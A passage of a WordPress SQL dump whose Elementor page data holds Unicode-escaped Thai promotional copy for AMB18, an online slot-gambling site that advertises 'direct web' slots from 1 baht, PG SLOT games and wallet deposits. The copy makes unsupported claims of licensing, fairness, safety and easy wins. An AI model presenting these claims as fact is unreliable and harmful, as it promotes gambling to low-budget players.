\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2868,389,'_thumbnail_id','371'),(2869,389,'_elementor_edit_mode','builder'),(2870,389,'_elementor_template_type','wp-page'),(2871,389,'_elementor_version','3.35.5'),(2872,389,'_elementor_pro_version','3.32.3'),(2873,389,'_wp_page_template','default'),(2874,389,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2875,389,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 